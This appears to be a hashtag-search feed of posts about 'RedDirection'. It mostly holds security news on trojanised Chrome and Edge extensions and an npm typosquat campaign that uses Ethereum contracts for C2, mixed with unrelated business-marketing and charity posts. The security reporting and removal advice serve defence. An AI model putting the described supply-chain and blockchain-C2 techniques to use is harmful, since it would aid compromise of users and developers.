🚨📷 @spintechinc 𝐫𝐞𝐬𝐞𝐚𝐫𝐜𝐡𝐞𝐫𝐬 𝐮𝐧𝐜𝐨𝐯𝐞𝐫𝐞𝐝 14.2𝐌 𝐦𝐨𝐫𝐞 𝐯𝐢𝐜𝐭𝐢𝐦𝐬 𝐟𝐫𝐨𝐦 𝐭𝐡𝐞 𝐑𝐞𝐝𝐃𝐢𝐫𝐞𝐜𝐭𝐢𝐨𝐧 𝐛𝐫𝐨𝐰𝐬𝐞𝐫 𝐚𝐭𝐭𝐚𝐜𝐤. Browser extensions hijacked traffic harvested data — silently. 📷hubs.li/Q03yKFTP0 #ExtensionRisks

RedDirection: 2,3 millones de usuarios infectados a través de una extensión de Chrome y Edge blog.segu-info.com.ar/2025/0…

#Malware_analysis 1. RedDirection Malicious Campaign - blog.koi.security/google-and… 2. macOS Odyssey Infostealer - cyfirma.com/research/odyssey… 3. Trojanized versions PuTTY and WinSCP - arcticwolf.com/resources/blo… 4. Zip Smuggling: Utility (github.com/Octoberfest7/zip_… )for creating zip files that smuggle additional data for later extraction YARA Rule - github.com/delivr-to/detecti… 5. Interlock RAT/NodeSnake - thedfirreport.com/2025/07/14… 6. Fake Android Money Transfer App - mcafee.com/blogs/other-blogs… 7. Malware in Official GravityForms Plugin - patchstack.com/articles/crit…

AS WE APPROACH SEPTEMBER, THE ATTACKS WILL BECOME INCREASINGLY SOPHISTICATED. BE CAUTIOUS!! Security researchers at Koi Security have uncovered a disturbing campaign called RedDirection, in which 18 previously harmless Chrome and Edge extensions were updated to include hidden Trojan. This operation has compromised over 2.3 million users by turning these extensions into tools for redirecting traffic, hijacking data, and maintaining persistent control, all without users’ knowledge. The extensions began as fully functional tools—such as color pickers, volume boosters, and weather services—with legitimate codebases that earned high user ratings, verified badges, and store promotions. Then, during a routine version update, attackers injected a Trojan component that activated bad behavior the instant users installed the new version. One such extension, “Color Picker, Eyedropper – Geco colorpick,” was singled out for now functioning as both a useful utility and a covert Trojan. Despite their legitimate functionality, these corrupted extensions silently monitored user activity. Each time a user visited a website, the malware captured the URL, communicated with a remote command-and-control server, and could redirect users to phishing sites or prompt fake software updates. BE CAREFUL WHICH EXTENSIONS YOU ADD !! dailysecurityreview.com/secu… BE CAREFUL WHICH PACKAGES YOU ADD !! thehackernews.com/2024/11/ma… Another ongoing campaign is targeting npm developers with hundreds of typosquat versions of their legitimate counterparts in an attempt to trick them into running cross-platform malware. The attack is notable for utilizing Ethereum smart contracts for command-and-control (C2) server address distribution, according to independent findings from Checkmarx, Phylum, and Socket published over the past few days. The activity was first flagged on October 31, 2024, although it's said to have been underway at least a week prior. No less than 287 typosquat packages have been published to the npm package registry. The packages contain obfuscated JavaScript that's executed during (or post) the installation process, ultimately leading to the retrieval of a next-stage binary from a remote server based on the operating system. The binary, for its part, establishes persistence and exfiltrates sensitive information related to the compromised machine back to the same server. But in an interesting twist, the JavaScript code interacts with an Ethereum smart contract using the ethers.js library to fetch the IP address. It's worth mentioning here that a campaign dubbed EtherHiding leveraged a similar tactic by using Binance's Smart Chain (BSC) contracts to move to the next phase of the attack chain. The decentralized nature of blockchain means it's harder to block the campaign as the IP addresses served by the contract can be updated over time by the threat actor, thereby allowing the malware to seamlessly connect to new IP addresses as older ones are blocked or taken down. "By using the blockchain in this way, the attackers gain two key advantages: their infrastructure becomes virtually impossible to take down due to the blockchain's immutable nature, and the decentralized architecture makes it extremely difficult to block these communications," Checkmarx researcher Yehuda Gelb said.

🛡️ Alerta: 2.3 millones de usuarios infectados por extensiones “inofensivas” en Chrome y Edge Una de las operaciones de espionaje más grandes jamás vistas en navegadores acaba de ser descubierta. La campaña se llama RedDirection. Y convirtió 18 extensiones populares en verdaderos troyanos que: 🔹 Espiaban cada página que visitabas. 🔹 Robaban tus datos de navegación. 🔹 Podían llevarte a páginas falsas que imitan a tu banco o a tus cuentas. Todo mientras parecían seguir funcionando normal: control de volumen, temas oscuros, teclados de emojis. ⚠️ ¿Por qué esto importa? Estas extensiones no empezaron siendo maliciosas. Por años tuvieron código limpio, buenas reseñas y hasta el sello de confianza de Google. Con una actualización silenciosa, se volvieron malware. Más de 2.3 millones de usuarios fueron infectados sin darse cuenta. Lo descubrió la empresa de seguridad Koi Security, que alertó a Google y Microsoft. Si usas Chrome o Edge, revisa YA si tienes alguna de estas extensiones: ✅ En Chrome: Color Picker, Eyedropper – Geco colorpick Emoji keyboard online – copy&paste your emoji Free Weather Forecast Video Speed Controller – Video Manager Unlock Discord – VPN Proxy Dark Theme – Dark Reader Volume Max – Ultimate Sound Booster Unblock TikTok – One-Click Proxy Unlock YouTube VPN Weather ✅ En Edge: Unlock TikTok Volume Booster – Increase your sound Web Sound Equalizer Header Value Flash Player – Games Emulator YouTube Unblocked SearchGPT – ChatGPT for Search Engine Unlock Discord 💡 ¿Qué hacer si encontraste alguna? ✅ Bórrala de inmediato. ✅ Limpia tu historial, cookies y caché. ✅ Cambia contraseñas de cuentas importantes. ✅ Activa verificación en dos pasos. ✅ Revisa movimientos sospechosos en tus cuentas. ✅ Usa un antivirus moderno que no necesite actualización

🚨 BREAKING: We uncovered "RedDirection" - 18 malicious browser extensions across Chrome & Edge that infected 2.3M users. Many were Google-verified & Microsoft-featured. Most are STILL LIVE in stores.

Aside from "owning libs," what do Influencers like these hold in common? Subversion and reddirection of organic vitriol.

Absolutely fantastic 🥂 Our @SuojellaanLapsi #RedDirection film produced by @havas won 💚💎💚#Vuodenhuiput 🥂 Thank you for your long & had work to #ProtectChildren #AgainstCSAM💚

It is essential to know that business resilience is often overlooked yet highly critical to business success. Download the #RedDirection Business Report, and improve your business preparedness for 2022. bit.ly/3phWgv3 #strategy #businessgrowth #businesstips #CX

How does your business measure up? Measure your company’s performance and position yourself to drive business goals. Download the latest #RedDirection Business Report. 👉 bit.ly/3phWgv3 #businesstips #smallbusiness #businessgrowth #strategy

Identify your strengths and weaknesses prioritizing for growth results. Recognize and leverage what you will not compromise as you execute your business strategy. Download the NEW #RedDirection Business Report: bit.ly/3iMkYCE #businesstips #smallbusiness #SMB

Why does your business need Fast Track Your Business Program? For one simple reason —. to help you stay aligned to your business’ True North. Commit to your #TrueNorth today by signing up at fasttrackyourbusinesstoday.c… #reddirection

so lots of things to consider, such as restricing bucket access, the origins, cache settings, https reddirection, http methods etc.

Hey everyone, I have a big announcement, something I'm very proud of. Introducing: Fast Track Your Business! The #RedDirection team's latest tool created to provide your business with a vast set of invaluable resources. Check it out: bit.ly/2LkOEsj #businesstips

#RedDirection @RedVacktor

Tear Down the Social Media Silo shrd.by/o1vFdq via @reddirection